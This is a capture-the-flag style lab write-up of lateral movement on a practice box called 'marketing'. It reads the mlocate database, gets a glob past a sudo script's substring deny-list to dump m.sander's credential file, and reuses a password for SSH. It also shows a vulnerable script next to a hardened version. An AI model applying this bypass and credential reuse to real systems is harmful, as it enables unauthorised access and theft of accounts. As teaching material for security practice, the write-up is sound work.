m.sander


After moving laterally to the t.miller user, the sudo rules were checked: t.miller is allowed to run /usr/bin/sync.sh as the m.sander user. The script compares an input file with /home/m.sander/personal/notes.txt and, if the two differ, updates the notes file. Run through sudo, that turns it into a primitive for reading (and copying) files as m.sander.

t.miller is also a member of the mlocate group, which grants read access to /var/lib/mlocate/mlocate.db, the path index that updatedb builds as root. The index lists paths under every user's home directory, and reading the database file directly (rather than through the locate binary, which filters out entries the caller could not reach) revealed a creds-for-2022.txt file in m.sander's personal directory, a candidate input for /usr/bin/sync.sh.

Forbidden


t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh /home/m.sander/personal/creds-for-2022.txt
error: forbidden

The direct attempt with the real path is rejected with the forbidden error.

Workaround


The error comes from an if statement in the script: the argument ($note) is rejected if it contains the string m.sander. That is a deny-list on the literal argument, and it is easy to work around with a shell wildcard, *. The pattern /home/m*/personal/creds-for-2022.txt does not contain m.sander, so it passes the check, and the script evidently uses the variable unquoted, so its own shell (running as m.sander) expands the pattern to the real path before handing it to diff. The trick depends on the pattern reaching the script unexpanded: t.miller's shell cannot match anything under m.sander's home directory, so it leaves the glob as a literal string instead of expanding it to a path the filter would catch.

Reveal


t.miller@marketing:/var/tmp$ sudo -u m.sander /usr/bin/sync.sh /home/m*/personal/creds-for-2022.txt
Difference: 1c1,8
< supersecret
---
> slack account:
> michael_sander@gmail.com - pa$$word@123$$4!!
> 
> github:
> michael_sander@gmail.com - EzPwz2022_dev1$$23!!
> 
> gmail:
> michael_sander@gmail.com - EzPwz2022_12345678#!
\ No newline at end of file
[+] Updated.

The content of creds-for-2022.txt is revealed in the diff output (the lines prefixed with >), giving three credentials for m.sander. Note the trailing [+] Updated. line: as described above, the script writes as well as compares, so this read is not side-effect free and the notes file has been modified.

  • pa$$word@123$$4!!
  • EzPwz2022_dev1$$23!!
  • EzPwz2022_12345678#!
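The source of /usr/bin/sync.sh is not shown in this writeup, so the following is an added example and not the box's script: a hypothetical re-creation of a substring deny-list of the kind that produced error: forbidden, showing why an unexpanded glob slips past it when the argument is later used unquoted, alongside a hardened check that canonicalises the path, allow-lists a directory, and keeps every expansion quoted. All paths, file contents and the allow-listed directory are constructed under a temporary directory for the demonstration.

```shell
#!/bin/sh
# Added example (not the box's /usr/bin/sync.sh): a substring deny-list on the
# argument beside a hardened path check. Everything lives under a temp dir.
set -u

BASE=$(mktemp -d)
trap 'rm -rf "$BASE"' EXIT
HOME_DIR="$BASE/home/m.sander/personal"      # constructed stand-in for /home/m.sander/personal
mkdir -p "$HOME_DIR"
printf 'supersecret\n' > "$HOME_DIR/notes.txt"
printf 'github:\nuser - constructed_password\n' > "$HOME_DIR/creds-for-2022.txt"
NOTES="$HOME_DIR/notes.txt"

# Vulnerable version: reject arguments that literally contain "m.sander", then
# use the argument unquoted, so the shell running the script expands any glob.
# Prints "error: forbidden" (rc 1) or the diff plus "[+] Updated." (rc 0).
vuln_sync() {
    note="$1"
    case "$note" in
        *m.sander*) echo "error: forbidden"; return 1 ;;
    esac
    # $note is deliberately unquoted: ".../m*/..." becomes ".../m.sander/..." here.
    out=$(diff "$NOTES" $note || true)
    if [ -n "$out" ]; then
        printf 'Difference:\n%s\n[+] Updated.\n' "$out"
    fi
    return 0
}

# Hardened version: canonicalise first, require a regular file inside an
# allow-listed directory, and keep the variable quoted so nothing can expand.
ALLOWED="$BASE/srv/sync"                      # assumed drop directory for inputs
mkdir -p "$ALLOWED"
safe_sync() {
    note="$1"
    real=$(readlink -f -- "$note") || real=""
    if [ -z "$real" ] || [ ! -f "$real" ]; then
        echo "error: no such file"; return 1
    fi
    case "$real" in
        "$ALLOWED"/*) ;;
        *) echo "error: forbidden"; return 1 ;;
    esac
    out=$(diff "$NOTES" "$real" || true)
    if [ -n "$out" ]; then
        printf 'Difference:\n%s\n[+] Updated.\n' "$out"
    fi
    return 0
}

# Demonstration: the real path is blocked by both; the glob form slips past the
# deny-list but is rejected by the hardened check because it is never expanded.
for p in "$HOME_DIR/creds-for-2022.txt" "$BASE/home/m*/personal/creds-for-2022.txt"; do
    echo "vuln_sync $p"; vuln_sync "$p" || true
    echo "safe_sync $p"; safe_sync "$p" || true
done
```

The hardened check does not try to enumerate bad substrings at all: it resolves the argument to a real file first, so a glob, a symlink, or a ../ sequence is judged by where it actually points, and the quoted variable means no second expansion can happen under the privileged user.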

SSH


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/marketing/Limesurvey-RCE]
└─$ sshpass -p 'EzPwz2022_12345678#!' ssh m.sander@$IP
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Tue 01 Apr 2025 05:13:25 PM UTC
 
  System load:  0.02              Processes:               235
  Usage of /:   69.9% of 9.75GB   Users logged in:         1
  Memory usage: 32%               IPv4 address for ens160: 192.168.211.225
  Swap usage:   0%
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
 
m.sander@marketing:~$ whoami
m.sander
m.sander@marketing:~$ hostname
marketing
m.sander@marketing:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:48:1b brd ff:ff:ff:ff:ff:ff
    inet 192.168.211.225/24 brd 192.168.211.255 scope global ens160
       valid_lft forever preferred_lft forever

The gmail password, EzPwz2022_12345678#!, is reused for the m.sander account on the box, so SSH with it completes the lateral movement to the m.sander user.